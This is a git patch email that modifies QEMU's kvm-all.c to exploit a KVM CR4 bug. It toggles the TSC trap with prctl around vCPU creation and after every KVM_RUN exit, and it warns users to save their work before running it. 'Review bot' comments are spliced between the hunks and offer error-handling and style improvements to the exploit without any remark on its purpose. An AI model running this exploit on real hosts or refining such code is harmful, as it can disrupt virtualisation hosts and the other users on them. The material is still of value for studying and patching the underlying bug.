>From 3689fa9aa528efc759ce9089454d1185d9bf29ae Mon Sep 17 00:00:00 2001
Message-Id: <3689fa9aa528efc759ce9089454d1185d9bf29ae.1412696684.git.luto@amacapital.net>
From: Andy Lutomirski <luto@amacapital.net>
Date: Tue, 7 Oct 2014 08:44:20 -0700
Subject: [PATCH] Evil QEMU hack to exploit a KVM CR4 bug

Save all your work before running a patched QEMU :)
---
 kvm-all.c | 18 +++++++++++++++++-
 1 file changed, 17 insertions(+), 1 deletion(-)

diff --git a/kvm-all.c b/kvm-all.c
index 4afcd0551bb2..2b4d4ace4d15 100644
--- a/kvm-all.c
+++ b/kvm-all.c
@@ -222,13 +222,15 @@ static int kvm_set_user_memory_region(KVMState *s, KVMSlot *slot)
     return kvm_vm_ioctl(s, KVM_SET_USER_MEMORY_REGION, &mem);
 }
 
+#include <sys/prctl.h>
 int kvm_init_vcpu(CPUState *cpu)
 {
     KVMState *s = kvm_state;
     long mmap_size;
     int ret;
 
-    DPRINTF("kvm_init_vcpu\n");
+    if (prctl(PR_SET_TSC, PR_TSC_SIGSEGV, 0, 0, 0) != 0)
+      printf("sad\n");
 
     ret = kvm_vm_ioctl(s, KVM_CREATE_VCPU, (void *)kvm_arch_vcpu_id(cpu));
     if (ret < 0) {
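Review bot: The failure branch of the new `if (prctl(PR_SET_TSC, PR_TSC_SIGSEGV, 0, 0, 0) != 0)` throws away errno and prints a bare `sad` to stdout, so a refused call (PR_SET_TSC is only honoured on hosts that implement it; elsewhere prctl() presumably fails with EINVAL) leaves no record of which call failed or why, and the rest of the hack proceeds as if the TSC trap were armed. Suggest `fprintf(stderr, "prctl(PR_SET_TSC, PR_TSC_SIGSEGV): %s\n", strerror(errno));` here, with the matching message for the PR_TSC_ENABLE calls; the same applies to the second hunk and to the pair in the kvm_cpu_exec hunk (errno.h and string.h are assumed to be in scope through QEMU's common headers). `#include <sys/prctl.h>` belongs in the file's include block at the top of kvm-all.c rather than between two function definitions, and the removed `DPRINTF("kvm_init_vcpu\n");` trace could simply stay above the new call. kvm_init_vcpu's body continues past this hunk.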
@@ -236,6 +238,11 @@ int kvm_init_vcpu(CPUState *cpu)
         goto err;
     }
 
+    if (prctl(PR_SET_TSC, PR_TSC_ENABLE, 0, 0, 0) != 0)
+      printf("sad\n");
+
+    printf("TSC on\n");
+
     cpu->kvm_fd = ret;
     cpu->kvm_state = s;
     cpu->kvm_vcpu_dirty = true;
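Review bot: `printf("TSC on\n");` is unconditional debug output to stdout from the vCPU init path, where the file otherwise uses `DPRINTF` for traces; `DPRINTF("TSC on\n");` (or fprintf to stderr) would keep it out of the guest's stdout stream. The trap is armed in the previous hunk and re-enabled here, so the window it covers is exactly the KVM_CREATE_VCPU ioctl between them; a one-line comment above this prctl, e.g. `/* TSC trap was armed before KVM_CREATE_VCPU; restore normal rdtsc for this thread */`, would make that deliberate-looking placement explicit rather than leaving the reader to infer it. kvm_init_vcpu continues on both sides of this hunk.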
@@ -1740,6 +1747,15 @@ int kvm_cpu_exec(CPUState *cpu)
         qemu_mutex_unlock_iothread();
 
         run_ret = kvm_vcpu_ioctl(cpu, KVM_RUN, 0);
+	{
+	  struct timespec ts = {0, 10000000};
+	  nanosleep(&ts, NULL);
+	  if (prctl(PR_SET_TSC, PR_TSC_SIGSEGV, 0, 0, 0) != 0)
+	    printf("sad\n");
+
+	  if (prctl(PR_SET_TSC, PR_TSC_ENABLE, 0, 0, 0) != 0)
+	    printf("sad\n");
+	}
 
         qemu_mutex_lock_iothread();
         kvm_arch_post_run(cpu, run);
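Review bot: The added block is indented with tabs while the surrounding kvm_cpu_exec code uses four spaces, so the hunk mixes both styles in one function; reindent with spaces to match the file. `struct timespec ts = {0, 10000000};` carries an unnamed magic value and the `nanosleep(&ts, NULL)` return is unchecked, so a signal arriving on the vCPU thread cuts the delay short without any indication; `struct timespec ts = { .tv_sec = 0, .tv_nsec = 10 * 1000 * 1000 }; /* 10 ms after every KVM_RUN exit */` and `while (nanosleep(&ts, &ts) != 0 && errno == EINTR) { }` (or a comment stating that an interrupted sleep is acceptable) would state the intent. Note that this runs on every exit from KVM_RUN, which is worth a comment since it dominates the vCPU's exit latency; time.h for nanosleep is presumably already in scope, since the patch does not add it. kvm_cpu_exec's body starts and ends outside the hunk.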
-- 
1.9.3